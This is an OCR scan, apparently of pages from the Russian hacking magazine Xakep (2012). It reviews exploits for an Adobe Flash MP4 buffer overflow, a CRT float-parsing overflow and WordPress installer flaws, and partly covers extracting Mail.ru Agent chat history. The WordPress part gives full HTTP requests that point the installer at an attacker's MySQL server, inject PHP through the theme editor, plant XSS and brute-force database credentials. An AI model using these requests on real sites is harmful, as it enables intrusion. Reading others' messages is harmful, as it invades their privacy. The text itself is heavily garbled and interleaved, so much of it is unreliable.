#pragma comment(linker, " / NODEFAULTLIB:msvcrt90.lib" ) #pragma comment(linker, " / NODEFAULTLIB:msvcrt80 . lib" )
CllТJ.JRRHlHG_PQP ;
rl!turn TRU[ ;
#pragma comment(lib,
"vsб/ ms vcrt.lib " )
chec k_ fl oat_ string из CRT
ХАКЕР
04 / 159/ 2012
051
www.epidemz.net
ВЗЛОМ/ ОБЗОРЭКСПЛОИТОВ
#define BUF_SIZE
Adobe Flash Player: переполнение буфера при обработке MPI. в SequenceParameterSetNALUnit
ВхЗВВ
2
void main( void {
CVSSV2
char *pStr; float f; int i;
10.0
1111 1111 11111 11 11 1111
1 IAV: N/АС: L/Au: N/C :С/ 1 : С/А: С]
DliШ
1О февраля 2012
pStr = (char*)malloc(BUF_SIZE); memset(pStr, В , BUF_SIZE); strcpy(pStr, "1 . " );
года в составе
metasploi t-a
nоявился новый модуль,
отве чающий за уязвимость в обработке mр4-файлов, которая осу ществляется комnонентом
Flash1 Ou.ocx Adobe Flash
Рlауег. Ошибка
расnолагается в sequencePaгameteгSet N ALUnit . Когда nроисходит обработ ка значения num _ гef_ fгames _ in _ pic _ oгdeг_cnt_cycle, раз
for ( i=l ; i<=BUF_SIZE- lB ; i++)
мер коnируемых данных никак не nроверяется, и nроцесс
{
strcat(pStr,
Fl ash'a
бездумно коnирует nодконтрольные nользователю данные из
"В" );
offset _ foг_гef_fгame в буфер фиксированного размера, расnолагаю
щийся на стеке. В результате э то nриводит к удаленному выnолне
printf( "Before scanf() \ n" );
нию nроизвольнога кода в контексте nользователя, запустившего
sscanf(pStr, "%f" , &f);
также указ ывают на то, что она активно использовалась
nроцесс
Flash-a.
Многочисленные сообщения об этой уязвимости
ITW.
1I!ПШ
printf( "After scanf() \ n");
Дизасм уязвимого места !функция sub_1005B396], Flash10u.ocx
printf( "%f \ n" , f);
10.3.181 .34:
.text:1BBSB482 call SubReadUExpGlomb ; читаем pic_order_cnt_type .text:1BBSB487 mov [esi+4Bh ], еах .text:1BBSB48A cmp еах, еЬр ; если pic_order_cnt_type !=В (еЬр=В) .text:1BBSB48C jnz short loc_1BBSB49D
if.1ildjf1 Windows Vista, Windows
Sегvег
2008, Windows 7, Wind ows
Sегvег
2008
fi•J!Iiit•J:I Существует обновление, устраняющее данную уязвимость
't OltyDbg - ms12-013poc.exe - [CPU- main thread, module ntdll: [fJ
Ftle
Vte>
Debug
Trace
Optюn.
,",,ndo s
=
@)
Нщ
§~~ ~~!!J ~~!bl.!bl ~.YJ ~~~.:!J~~ ~~_!!] ~ 8848 F8 8940 R4 854F 4С 74 еб 334F 50 8940 R4 0FB7C9 8875 ев 0FB7C9 3809 0F87 C0R70300 8056 0э 8955 С4 8848 04 8819 3808 0F85 B4R70300 8902 894R 04 891 1 8950 0 4 0F870б
0147 78 8887 в8000еее 85се
0F84 R42CF EFF 0F871E 8985 5CFF FFFF
MOV Е СХ , OWORO PTR OS: CERX-8J MOV OWORO PTR SS : С Е8Р- 5С J , ЕС Х TEST OWORO PTR OS: CEOI+• CJ,ECX J E SHORT 770E028R XOR ECX ,OWORO PTR OS: CE0!+50J MOV OWORO PTR SS: CEBP-5C J , ЕС Х MOVZ X Е СХ , С Х MOV ESI ,OWORO PTR SS : !E8P+8J tiOVZ Х Е СХ , С Х Ct1P ЕВХ . Е СХ JR 77E1 RR8B LER ЕО Х , !ES !+8 J tiOV OWORO PTR SS : I EBP-3C J , ЕОХ MOV ECX , OWORO PTR OS : IERX+4J MOV ЕВХ , OWORO PTR OS : !ECXJ С 11Р ЕВХ , ERX JNE 77 E1RR92 MOV OWORO PTR OS: CEOXJ , ERX MOV OWORO PTR OS : CEOX+4 J.ECX MOV OWORO PTR OS : !ECXJ ,EOX MOV OWORO PTR OS:!ERX+4J , EOX MOVZ X ERX , WORO PTR OS: !ES I J ROO OWORO PTR OS : CEO I +78J, ERX 110V ERX,OWORO PTR OS: !EOI+ 088J TEST ERX, ERX J E 770C2FR0 MOVZX ЕВХ , WORO PTR OS: CES I J MOV OwORO PTR SS : !EBP-0R4J,ERX
i steгs С FР Ш
00531218
tdeciмa l
Р
77DE0204
~-1~_11Jl'LЯJ\.II.1UUlHJiJLI\1ЩjUIJIJL.HЛ.t.1L_1 1 ~;,~
J"
~
1 Z 0
OS FS 0053 З2Ь L
S 1 Т 1)
о
J l l . 77DE0204
li~Ч~ .c:.bLt 111 -2bLt uu в З2btt 00"~ З2Ь а<
1 1
G
0
О О
0028
2
O(FFFFFFFF)
0(FFFFFFFF1 ЫFFFFFFFF)
01 FFFFFFFFJ 7EF OOt FFF) HF FFF',.
L~
•Err ееееее7 Е EF P~l1 0_1 T_FOU''D EFL 00018297 (~ •.B,N , ,Г,L,LE) емрtу
G. O
ST.?
емоtу
(t.O
~Т=!:
e-,.1pty 0.0
STO
STl E'MDtY (1, о
'Т4 e-f"•~ty (1.0 те: e-tt.~ty о. о о E"f"lpty 0.0
·
•• Pt У 1 • еееееееееееееееееее ?21.) d J О 0 О
70. J t
Нен
" 1_1>1
r
Е
€!27F ~ddre s.s
1
Е 0018FB30 ЕЕ Р 8018FCI8 Е ее538708 ее53ееее
Er
( 30303030) =???
ЕВ Х :0000004б
I~LI
эе3е3еэе
ее5307Ее ееееее4б
duм
RSC I I
~C18Fb-:>4
754RбСС 1 ~ 1Ju 00\JOOOCIO .• ••
OQ18F838
00530000 , • S.
OOISFBЗC
00000000 • .••
00000000 ....
0018F85'3 00:1SFB54
63040265 ES•c 00000{t0\З ••••
8ЫЭFВ5С оы ЭF86О
бОЕ29S28 000СЮ\ЗОIЭ
00000(Н)0 00000(Ю0 ооsзвr (Н)SЗ(ЮОО
so
О О
fG
1 1 1 1 1 1
0023:00401090 '~1l-01Зpoc.0040109D
•... ....
00531218 t*S· ASCJ I 00000000 00000000
()~I~FB84
'SPU 0 0 0
О О О
POS.
01)18F870 OOISFB7S 0018FB7C 001 SF880
r
••••
•• S. 00000000 •••. СЮОООООО •.•.
001SFB74
Е•
t1
t Хт '
0018FB64 0018FB6S OOISFBЬC
NH~R.S.::
p·S.
OOISF840 0018F844 0018FB48 001SFB4C OUI8F858
~
005307ЕО
смd
. .с
"UОО•З0(1€J000001~Ш(1ООООООС100000(t1Э000"
OQ(t001JOO OC(I00000 000~0009
ms12-013: результатпереnолнения кучи
ХАКЕР
052
www.epidemz.net
04/159/2012
Обзор эксплоитов
.text:1EJEJ5849D xor е Ь х , еЬх еЬх . text:1EJEJ5849F inc .text:1EJEJ5B4AEJ cmp еах, е Ь х .text:1EJEJ5B4A2 jnz short loc_1EJEJ5 B4EF ; если pic_order_cnt_type != 1 .text:1EJEJ5B4A4 mov есх, edi .text:1EJEJ5B4Aб call SubReadBit ; читaeм 'delta_pic_order_always_zero_fiag .text:1EJEJ5B4AB mov есх, edi .text:1EJEJ5B4AD mov [ esi+48h ] , al .text:1EJEJ5B4BEJ call SubReadSEx pGlomb ; читаем offset_for_non_ref_pic .text:1EJ05B4B5 mov есх , edi .text:1005B4B7 mov [esi+ 54h ], еах SubReadS ExpGlomb .text:1005B4BA call ; читаем offset_for_non_ref_pic .text:1005B4BF mov есх, edi .text:1005B4C1 mov [esi+50h ] , еах .text:1005B4C4 call SubRead UEx pGlomb ; читаем num_ref_frames_in_pic_order_cnt_cycle .text:1EJ05B4C9 mov [esi+4Ch ] , еах .text:1005B4CC test еах, еах .text:1005B4CE jbe short l oc_10EJ5B4EF ; если num_ref_frames_in_pic_order_cnt_cycle е .text:1005B4D0 lea еах, [esi+58h ] .text:1005B4DЗ mov [ esp+10h+ptr], еах .text:1005B4D7 .text:1005B4D7 l oc_100 5B4D7: ; CODE XREF: SubParseSeqParameterSet+157(j mov . text:1005B4D7 есх , edi .text:1005B4D9 call SubReadSExpGlomb ; читаем offset_for_ref_frame .text:10EJ5B4DE mov есх , [esp+10h+ptr ] .text:1005B4E2 add [ es p+10h+pt r ] , 4 .text:1005B4E7 inc еЬ р ; еЬр - счетчик цикла .text:10EJ5B4E8 mov [ есх ], е а х ; есх указывает на буфер на стеке .text:10EJ5B4EA cmp еЬр, [ es i+4Ch ] ; сравниваем счетчик ; с num_ref_frames_in_pic_order_cnt_cycle .text:1005B4ED jb shor t loc_1005 B4D7
149 <?php 150 break ; 151 case 2: 152 $dbname = trim ($_POST [ ' dbname ' ]) ; 153 $uname = trim ($ POST [ ' uname ' ]) ; 154 $passwrd = trim ($- POST [ ' pwd ' ]) ; 155 $dbhost = trim ($-POST [ ' dbhost ' ]) ; 156 $prefix = trim ($- POST [ ' prefix ' ]) ; 157 if ( empty($prefix ) ) 158 $prefix = ' wp_'; 159 160 161 // Validate $prefix : it сап only contain letters, nu mbers and underscores 162 if ( preg_match ( ' 1[ла-z0-9_] li ', $prefix ) ) 163 wp die ( / *WP I18N BAD PREFIX*/ ' <strong>ERROR</st rong>: "Table Prefix" can- only contain numbers, letters, and underscores. ' / */WP_I18N_BAD_PREFIX*/ ) ; 164 165 11 Test the db connection . / **#@+ 166 * @ignore 167 */ 168 define ( ' DB NАМЕ ', $dbname ) ; 169 define ( ' DB- USER ', $uname ); 170 define ( ' DB- PASSWORD ', $passwrd ) ; 171 define ( ' DB- HOST ', $dbhost ) ; 172 / **#@-*/ 173 174 175 11 We'll fail here if the values are no good. 176 require wp db () ; 177 if ( ! ёmpty( $wpdb ->error ) ) { 178 $back = ' <р class="step"><a href="setup-config.p hp?step=1" onclick=" j avascript: history. go( -1); return fal se;" class="button">Try Again</a></p> '; 179 wp_die ( $wpdb ->error ->get_error_message () . $ Ьас k );
180 181
} 175,2-5
П ара м ет р ы, прин и маемы е ск рип том
61%
setu p-config.php, ни как не фильт ру ютс я
Claud i us] опубликовала очере дную пачку у язвимастей в движке Функция SubReadUExpGiomЫI читает из файла экспоненци-
WoгdPгess. Среди них - исполнение произвольнаго РНР-кода ,
альный код Голом ба и декодирует его в беззнаковое число.
множественные ХSS-уя звимост и, а также раскрытие имени поль
SubReadSExpG iomb(] читает экспоненциальный код Голамба и деко дирует его в знаковое число. Функция SubReadBitll производит чтение
зователя и паролядля подключения к серверу MySQL.
одного бита. Как видишь, в вышеприведенном коде не произв одится
никаких проверокна значение пum_гef_f гames _ iп _ pic _oгdeг_ спt_
tm!Шi
1. Исполнение произвольнаго
РНР-кода и хранимая XSS в с крипте setup-config.php. Сценарий исп олняется в процессе инсталляции
cycle. Вдобавок ко всему Flash Рlауег не используеттакой защитный механизм как stack cookies, поэтому атакующий может получить контроль над регистром eip без каких-либо проблем.
WoгdPгess и позволяет устанавливать движок с использованием ло
if.1ild3f1
злоумышленник может поднять с вой собственный сервер MySQL
кальной или удаленной базы данных MyS QL. Для этого необходимо
ра с полагать валидными реквизитами для доступа к MySQL. Однако
Adobe Flash Рlауег<= 10.3.181.36
и использовать его в процессе установки, при этом не располагая
логином/паролем к MySQL на целевой системе. После успешной ин
F-1•J!Iiit•B' Обновиться до версии
сталляции WoгdPгess злоу мышленник может внедрить произволь ный РНР-код через редактор тем WoгdPгess. В допол н ение к этому,
10.3.183.5
благодаря доступу к базе данных WoгdPгess становится возможным внедрить произвольный Javascгipt-кoд в контент движка, тем самым
3
Множественные уязвимости в WordPress
реализуя уязвимость хранимой XSS. Атака проводится следующим образом. Допустим,
CVSSV2
Z5
11111 1111 111 111 11111
A.B.C.D- целевой
сервер с WoгdPгess, а W.X.Y.Z- сервер злоу мышленника с установ ленной MySQ L . Посылаем POST- и GET -запросы для установки WoгdPгess с исполь
IAV: N/ АС: L/Au: N/C: Р/1: Р/А: Pl
зованием базы данных злоумышленника:
[]]Ш В конце января компания Tгustwave Spideгlabs в
РОS Т-з апро с
лице и ссле дователя Джонатана Клаудиуса (Jonathan
POST /wp - admin/setup-config.php?step=2
ХАКЕР
НТТ Р/ 1 . 1
05 3
04 /159/ 201 2
www.epidemz.net
ВЗЛОМ/ ОБЗОРЭКСПЛОИ ТОВ
Host: A.B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10.6; rv:8.0.1) Geeko /20100101 Firefox/8 .0.1 Aeeept: text/html,applieation/xhtml+xml, appl i eation/xml;q=0.9 , */* ;q=0.8 Aeee pt -Language: en-us,en;q=0.5 Aeeept-Eneoding: gzip, defiate Aeeept -c·ha rset: 150-8859-1, utf -8 ; q=0. 7, *; q=0. 7 Proxy-Conneetion: keep-alive Referer: http: // A.B.C.D /w p-admin/setup-eonfig.php?step=1 Cookie: wp-settings-ti me-1=1322687480; wp-settings-1=m9%3Do Content-Type: app l ieation /x -www-form-urleneoded Content-Length: 81 dbname=wordpress&uname=jsmith&pwd=jsmith&dbho st =W .X.Y.Z &prefix=wp_&submit=5ubmit GЕТ-запрое
GET / wp-admin / install.php НТТР / 1.1 Host: A. B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10.6; rv:8.0. 1 ) Geeko / 20100101 Firefox /8.0. 1 Aeeept: text/html,applieation /x html+xml, app l ieation /x ml;q=0.9, */*; q=0. 8 Aeeept - Language: en-us,en;q=0.5 Aecept-Encoding: gzip, defiate Accept-Charset: I50-8859-1,utf -8 ; q=0.7, *;q =0.7 Proxy-Connection: keep-alive Referer : http: // A.B.C . D/wp-admin /se tup-config.php?step=2 Cook i e: wp-settings -ti me-1=1322687480; wp-settings- 1=m9%3 Do If-Modified -5ince: Wed, 07 Dec 2011 16:03:33 GMT С nомощью редактора тем W oгd Pгess редактируем файл
404.php
[или люб ой другой, доступный в использ уемой теме], тем са мым реализуя возможность исполнения РНР-кода :
<?p hp phpinfo(); ?> Исполняем код с помощ ью GЕТ-запроса или прост о откры в стра ницу в браузе ре:
GET /wp -content / themes / default/404.php НТТР / 1.1 Host: A.B.C.D User Agent: Mozilla/5.0 (Macintosh; I ntel Мае 05 10.6; rv : 8 . 0.1) Gecko/20100101 Firefox / 8.0 . 1
10. 6; rv:8.0.1) Gecko/20100101 Firefox /8 .0.1 2.
Мн ожес твенн ые
XSS
параметры
«db nam e>>, «d bhost » или << uname >>. Это реализуется
через следующий РОSТ -зап рос: РО5Т /w p-admin / setup-config.php?step=2 НТТР / 1.1 Ho st: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Мае 05 Х 10. 6; rv:8.0.1) Gecko /20 100101 Firefox /8 . 0.1 Accept: t ext/ html,appli cation/xhtml+xm l , application/xml;q=0 . 9, */* ;q=0.8 Accept-Language : en-us,en;q=0.5 Accept-Encoding: gzip, defiate Aeeept-Charset: I50-8859-1,utf-8;q=0 . 7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-eonfig.php?step=1 Content-Type: application/x-www-form-urlencoded Content- Length: 112
dbname=%3Cscript%3 Ealert%28%27123%27%29%3C%2 Fscript%3 E& uname=root&pwd=&dbhost=loealhost&prefix=wp_&submit=5ubmit 3.
Раскрытие реквизитов для доступа к базе данных
с крипт
setup-conf ig .php.
MySQL через
В процессе ин стал ляции пользователь
задает параметры базы данных
MySQL, как уже обсуждалось
ранее. При вводе неправильных реквизитов скрипт выдает ошиб ку, чем и можно воспользоваться, осуществляя брутфорс имени пользователя и пароля к
MySQL, причем
не только локальной, но и
любой удаленной. Запрос выглядит следующим образом: РО5Т /wp- admin / setup-config.php?step=2 Н ТТР/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Maeintosh; Intel Мае 05 Х 10 .6; rv:8.0.1) Gecko/20100101 Firefox / 8.0.1 Aecept: text/html,applieation/xhtml+xml, applicat ion /x ml;q=0 .9,*/*; q=0 . 8 Accept-Language: en-us,en;q=0.5 Aecept-Encoding: gzip, defiate Aeeept-Charset: I50-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-al ive Referer: http://A.B.C . D/wp-a dmin/setup-config.php?step=1 Co ntent -Type: application/x-www-form-ur l encoded Content-Lengt h: 32
uname=user&pwd=pass&d bho st=L.M .N.O Х
В нем делается попытка коннекта к серверу лем useг и паролем
Та к же злоумышлен ни к можети спользоватьхран имую
в скри пте setup-coпfig.php. В процессе ин
сталляции элаумышленник может внедрить Javascгipt-кoд через
L.M.N.O
п ользовате
pass.
XSS для
а та к и на пользователей,- для этого не обходи м о выполнить
jf.1;1djfj
такой запрос:
WoгdPгess
UPDATE wp_comments 5ЕТ co mment _c ontent= ' <script>a l ert( ' 123')</script >' where comment_content= ' Hi, this is а comment. <br /> То delete а comment , just log in and view the post&#039;s comment s . There you will have the option t o edit or delete them . ' ;
l'j•J!Ijil•J:I
Когда пользователь зайдет по ссылке, указанной в следующем GЕТ
ляютаккаунты,вкоторыхпоумолчаниюприсутствуютдистрибутивы
зап росе , в его браузере выnолнит ся внедренный Javascгipt-кoд:
WoгdPгess суетановочными скрип т ам и, а клиент их может даже и не
3.3.1
и более ранние .
Так как уязвимый скрипт- инсталляционный, разработчики WoгdPг ess посчитали возможность реализации этих уязвимастей крайне малой и не стали выпускатьофициальных патчей. << Ни один нормальный пользователь не будет оставлять инсталляционных скриптов у себя н а сервере или прерывать процесс уста новки », с читают они. Однако н екото рые хаетингавые компании предостав
планировал использовать. Для защиты сво их серверов от этих атак
GET /? р=1 НТТР / 1. 1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel
можно порекомендоватьлишь пользоваться с ложными парелями к
MySQL, а также использовать WAF, например , ModSecuгity, в правилах Мае
05
Х
которого учтены подобного рода атаки. :Н:
ХАКЕР
www.epidemz.net
04/159/2012
·.
MAKJ.M А АnьФа· Банк (game}land
-
ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от
www.epidemz.net
29.01.1998 NQ1326"
www.epidemz.net
localhost t '
Incorrect syntax near the keyword 'se lect'. Incorrect syntax near '%' . Unclosed quotation mark after the character string ". Sys t e nl. Data . Sq i Ci i ent.Sq i Excepti o n ln c orrect syп tax 11e ar t l1e k e ywo r d 's e l ect ' . S)'!!lte:n . Dato . SqlClient. . Sql Ex cept.icщ
lп co rrect syпta x
( Ох6 0 1Зl9 0 4 ) :
n ea r
Incor r ect. 11yntax
'О/о' .
nе .н
U11 c losed q u otation m a rk afte r t l1e c l1 a r acte r s tri n g ". the keywt>rd ' :!!ele ct' .
Inco rre ct !!lynta x nе.н ' \ '. Unclos ed qUOt". ti on :::A tk a ~te r t he Ch o!! r &ct er !!ltt ing: ' ' . a t s~·ster~.Dato .SqlClient.SqlCo:mecticm . Dn!п •. (SqlExceptlon ех::~;:-:::~~ . Bcolean b:~"_:.::::!"lr.e:::::~. ) o!!t Syste.:n.Dota.SqlClle!"lt . Sqli!"IternolCon!"lectlOn. ·ru:r~ 'r {S:,lException е :е~::.:~.• 3oolean b:eai.::::-.::ee": ~~- 1 at Sy:~teш. Dat!I.SQ:lClient. IdsPar!!ler . Тh-rc ·~хсер:1 )f\A.'1: rnJ.nq O o!! t Syste.:n. r!ata. SqlClient. id!!IPar!!ler . T~JRun (Runfleha;·ior ::-.;~eha::~::: , SqlCo:r::an:! ::::-.-:!~an:!.j_e::; , S:,l:>ataRe4:!e:: :!.atoSt~e~~~ , BuH"Ccpy5iqйeRe5ultSe o t S)':lteш. Data.SqlClient.Sql:>otaReoder . TrJ(" _ns\.l.lllcl~· а1 . () o!! t Syste.:n. Dato. SqlClient. SqlJatt.Reode:: . Jet_!!etaDt.>:ll {) at Sy5te!l".. Data . SqlClient. SqlCc=and . ~·шlshExecuteRe,,Qer (S:,lDt.taReader :1~ , Ru.пBeha•JlOI :unВе~нг.:.::: , Sttlnq ::e;'le":ct:;t ::;:J.!S:r : ;:q ) at Systeж. :lata. SqlC11ent. SqlCo:-.:r.an:! . RwlExecuteReader'!'<Ь {Co~nd3ehavio:: ::-:I.Se!">a·:lc:: , RunВehavior ::. ~: •.&":.-;::: , Soolean :e:·Jr:"lSt:ea:- , Зооlеа ot Sy.!teш . Data. SqlClient. SqlCc:r.:r.an:! . RunExecuteRea~.,.. (Co:r.::-.andВehavior =-::!Ее~.&".:.:::: , RunВehavior : ;::~:!.е'и!.V1.:::: , Вaoleen :e~-.::n::-:.rea:r , Strinq -е at S}'.!tem. Jata. SqlClient. SqlCo:r.иn:!. Run!xecuteReade~ {Co:::=.andЗehavio: c.:-:1.3eh!··:.:: , Rui"\Вehavior _u:-.Eeh.a··::::: , &oolean ::e:·;:::~S-:::ea:- , Strin; :-е ~~~ Sy.!~eш.:1ata.SqlClient.SqlCo~nd . V.xeruteRea1er [Co=.andВehev.i.or l:e: с-: , St:1ш;; - ~:ht::::l ) at Sy!!ltell!. Data. SqlClient. SqlCcrr.:r.and . ExecuteDbD<•ti!.Re -r {to~r.:r.andВehavior .с~=--~·· :. : ::) at. Sy.ste~~:.Deta.Qb)e.cts . ~b]ectContext . !xc.- Jt~StтreQuerJir,t• · .:. r'!'Ele.a.t::.~' {Stвnq с.с- ... ,;.:::!I е к: , S~rinq е:::~ ::iS:e:::e::-~ , a t Sy!!ltem.Date.Ob)ect5.0bJectConte xt . f:x~= ~ .'<J:St JteQuerJ (ТEl··-~~entl (Striпq :.::· :-н;.:l:"ех: , Ob)ect{ 1 ~arar _:е:.! )
~e:qeCption ::-~::~e:j::; :. -:::
20,19\S; З..•"""""' CO&t~I)00311A07DЛ}98.16fAAJD9!!f07~[8HF979 03iiODC0Jl10(8UFдm!106C ESF EA!»9E9HC81 J З
ЬI 1 0001!9J9~)6SOIAJ.ACCЯ J .O.SOII~EC)IO'J7jJ FJШШ7666106l.F50Н7 Jfi JNDD!f6C781l!81E.I"6 ICOE!!8EШ11 4 9~82 B I28CF[I i0710687SU17Uff!
93.eJSIFI!iiOZ3JD1CSII00;<31FIIE201!881(6(&S8((76 fi-"U99690CClOIЫISFJSC!9CDCВ.U.
www.epidemz.net
-
Home
Se1rc:h
Store
ASP.NET MVC MUSIC STORE
<I P•rн c httP"'d~ltl>
<tlld
,._ .•t:rrorЩ" tп-o" ft-lo.Error~oiJIID<I"l~.
c oold
~"t • " lrrorfloH"
ll.Nh" />
typt • " flaoh.fn_tl_LI, lloooll " />
( odd"..., . " fr.-orflltrr" t~ ·· H...... (.-rorflltr-le,!l.мlo " /> ~/ Mtpllo .... l o o>
<httpl<o•>cll••» <tdol ~"'"" " I'OST,ЫT,III!IO" p,.h• "elaoh.o•d " < 1 ~>t • " l1Nh.lr,...rtoef'•I•'..,'""Y· rtu~~·
1>
</httptio"'ll l e•P </ oy118.wb>
<lyst .... W~"'"' '
cvoli ... tl...,volloUto!M•I'"'~""fll"rotl.,.. • " folw "
<-
/>
c-..too .... ~AIII-.""I"roн~l••'"'""'ll~o-,...oto• " t...,. · > • ..U I>M~ · · trrcortoa · ty"... " l'-"·lrn>rt~le, H&~h " p•eC:0"4111_ •._..,..._...tler• 1> ~- · "ln'0/' ... 11" · ,pe• " Hqh.(rr-llOio<lulo, Н...,. • ...-o<-IHO!' •" •o~oat-dlor " 1> <..W •- · " II'Т'OO"•Btor " </-IISJ
tt~ · " fl..Ь.E.......-f\IH.....,..Ir,
(Jaoh"
,-f'{-!tl"" · · _..,......,dJo~ ·
1>
.......н,... ••
. ... ~- - · н... ~ · ~ ~~~ - · ~ш~ .•,... . •• .-ь- ·юsт,r.I'T,Itf.ID " c/~1'14!~-lt•- ·t.,lolr•t..._ . />
typc • " (tu~.(~ ...... t.c~•••'•€tC>I")",
rtuh"
:~:: :-~ >
www.epidemz.net
··n~1<>1LWЬOII IIIItlt CII . ~U.tot.i.",t • • adm" а! • hiC:klt tdF
aFWeECh Gp9291~
'•m
,.F tlgm 1h]~L
181 RJ oyel
'1'6tyтТEpKzk00yA >tu;JnZ4tplq1eдZ4A,..
Cart ~01
dmln
The contro ller for path '/ Mus icStore/ Bad ' was not found or does not implement ICont ro ll er. System. Web. HttpEx ce ptioп The c oпtroller for path '/ MusicStore/ Bad ' was
поt fouпd
or does not implernent IController.
Syзtem . \\еЬ.
at at at аt
at at at at at at at at at
Logged
HttpE:xception (0 х 80004005) : The controller : or p~th ' / Xusic Stor e / Bad' \·;аз not :ound or doe3 not irrфl e me nt IConcroller. i\eb . Y..vc . ::>e:aultCo=:~trollerFactory . GetControllerinstance ( RequeзtContext .e~.;e"::c;)te x t , Туре cc;J.tJ::::l:e:T:,.-pe ) Syзtem. Keb . ~vc. ::)e:aultControllerFact.ory . Crec teController ( RequeзtContext :e:rueз~::::::.:ext , String CC:'I~:c:le: : :a=.'.:!: ) Syзtem. i\eb.~o/c.~.rcHandler . ProcessRe .{Ues In1.t ( HttpContextBaзe h:tpC'c:'\te :-::::. 1 IController' cc:1trclle: , IControllerfactory• • .:.c:c:::J") Syзtem. КеЬ. Иvс. X"'vcHandler . <>с_DiзрlауСlаззб . <Вeg.LnProcessRequest>Ь_ 2 () Sy.!tem. i\eb . Иvc . Securit;yUtil.<>c_JiзplayClaззb'l . <P "CessinApplicationTrost>b_ ( 1 Syзtem.1\eb.Y.vc . Securit;:,•Ut;il . <GetCallinApt::.,.rust'r..·ш .k.>t _O (Action :) Syзtem.l\eb.!-!vc . SecurityUtil . ProcessinAf:.,vl... ~onтrus {Action асисn ) Syзtem. i\eb.Y.vc . SecurityUtil . ProcessinAppl... 1. n.,.r .:;· ТЧ.езult] ( Func ' 1 :и::. с) Syзt;em. i\eb . Y.-.;c . ~·.;cHandler . ВeginProcessRt:ч 1eg• ( HttpConteкtBaзe h:;:;~':c:1:e:·:t , AзyncCallback calltao:;.; , ()bJect з\:.аtе ) Syзtem. i\еЬ.М".;с .~·.;cHandler . ВeqinProcessRe(!Ues· (Ht;t;pContex:t ht:~:c:1:;e z t , AзyncCallback callbac;.:, CbJect зtа.:.е ) Syзtem. i\eb . Y.vc.XvcHandler . Syзtem. Web . IHttpAзync!iandler . ВegJ.nProcessReques'" (HttpContext ccn::.e :-:-: , AзyncCallback сЬ , ObJect e:-:::.-a:Jata ) Syзtem. i\eb. HttpApplication. CallHandlerExecut~onStep . S:,•зt.em . i\eb . HttpAppl~ca tion. IExecutionStep . Execute () Syзtem. i\eb. HttpApplication . ExecuteStep (IExecutionStep зtet: , Boolean' cc:r~le-:e::IS:i:1Ch:::onou.3l:r· ) Syзtem.
сп
4
феераля
2012
г.
at 10:06 :01
www.epidemz.net
взлом
гента ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ ПЕРЕПИСКИ И КОНТАКТАМ В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ
Ты вряд ли пользуешься
Ru
Mail.
Агентом, но это бешено
ИСТОРИЯ ВЗЛОМА Н е забывай о статье
138- « Нар уше ние
Эксперимент начал ся для меня еще в далеком
2008
году когда
друг попрос~л проверить переписку его девушки в Mail . ~u Аген
популярный сервис, который
тайны переписки ,
с каждым днем набирает
nереrоворов,
обороты . По официальным
телеграфных или иных сообщений »
и данные о конт~ктахl примитивную структуру. За пару часов был
данным месячная аудитория
УК РФ, а также
;аписа н простои , но эффективный R ТF -конвертер, который и де-
те. Тогда фа ил истории представлял из себя простой текстовик
f
телефонных nочтовых ,
на_званием *email*histoгy . txt и имел по сравнению с mгa.dbs
фа ил, в котором в настоящее время хранится ис т ория пере п иски
о наличии в ней главы 28 -
ал всю грязную работ у по вытягиванию переписки из Агента
н Преступления
Друг был в восторге. Далее, в ходе изучения программирова-.
прошлого года составляла
в сфере
ния на компилируемых языках, я в качестве практики написал
безумную цифру в
информации » lст.
этого мессенджера в конце
21,4
миллиона человек. Это
комnьютерной
программу M ail.гu H istoгy Readeг, о п исание которой попало на
страницы][ в августе
272, 273, 2741.
тогдашнего фаила истории \см. ссылки в боковом выносе! и ис
легко объяснить,- продукт действительно удачный . Но сегодня я хо чу рассказать
о том, как был разреверсен
файл с историей сообщений пользователя.
2009 года. Получив большое количество
положительны~ отзывов, я опубликовал с трук т уру формата ходники читалки. Однако Mai l. гu Агент продолжал развиваться
пример читалки
и править балом стал новый продвинутый файл mгa.dbs. П осле,
истории mгa . dbs ,
этого соб~тия ко мне посыпались тонны сообщений от различ
На ди ске ты найде шь
реализацию класса
уnрощающего
'
исследование
бинарных файлов в WiлНе х-ре дакторе, и другие материалы по статье
ных людеи с просьбами за н яться им. В компа н ии с
SO LON7 мы
ковыряли этот файл в Н Е Х-редак т оре, пытаясь най т и структуры
~сы,лки на смещения и всевозможные изменения после запуска' al
.гu Агента. К концу
201 О
года после долгих поисков формат
все-таки покорился.
ХАКЕР
060
www.epidemz.net
04/159/2012
Взлом
КАК ДОБЫТЬ ФАЙЛ MRA.OBS? Ты, конечно, задашься воnросом: а где, собственно, хранится
э тот nресловутый mгa.dbs, и как его добыть? Файл mгa.dbs
хранится в nапке <<%APPDATA%\Mгa\Base\mгa.dbs» [наnри-
мер <<C:\Documents and Settings\useг\Application Data\Mгa\ Base\mгa.dbs>>], и заnолучить его nри выключенном Агенте не так уж и сложно, достаточно лишь исnользовать функции
ExpandEnviгortmentStгings и
CopyFile.
Однако nри включенном
Агенте файл mгa.dbs является занятым и система nопросту не nозволит его исnользовать. Для решения этой nроблемы можно,
наnример, временно отключить Агент [для этого действия тебе nонадобятся nривилегии отладчика, которые можно nолучить
странство своего nроцесса. Также можно nроче с ть файл наnря
ro
'13 C'i
10 00 00 00 06 00 00 00
00 00 00 00 00 00 00 00
ot
оо оо оо
лr
01
оо оо
оо
оо
~00
оо
во
0'\ 00 00 00 07 00 00 00 Сб
01 00 00 0'1 00 00 00
09 00 00 00
9С
01 00 00
01 00 00
03 00 00 00 18 00 00 00
00 00 00 00 OD 00 00 00
86 01 00 00 01 00 00 00
J.O 01 00 00 01 00 00 00
А2
00 00 00 00 00 00 00 00
ал оо
01 00 00 00 8[ 01 00 00
01 00 00 00 1D 00 00 00
00 00 00 00 06 00 00 00 76 01 00 00 07 00 00 00 ОА 00 00 00 4С 01 00 00
20 00 00 00 06 00 00 00 01 00 00 00 60 01 00 00
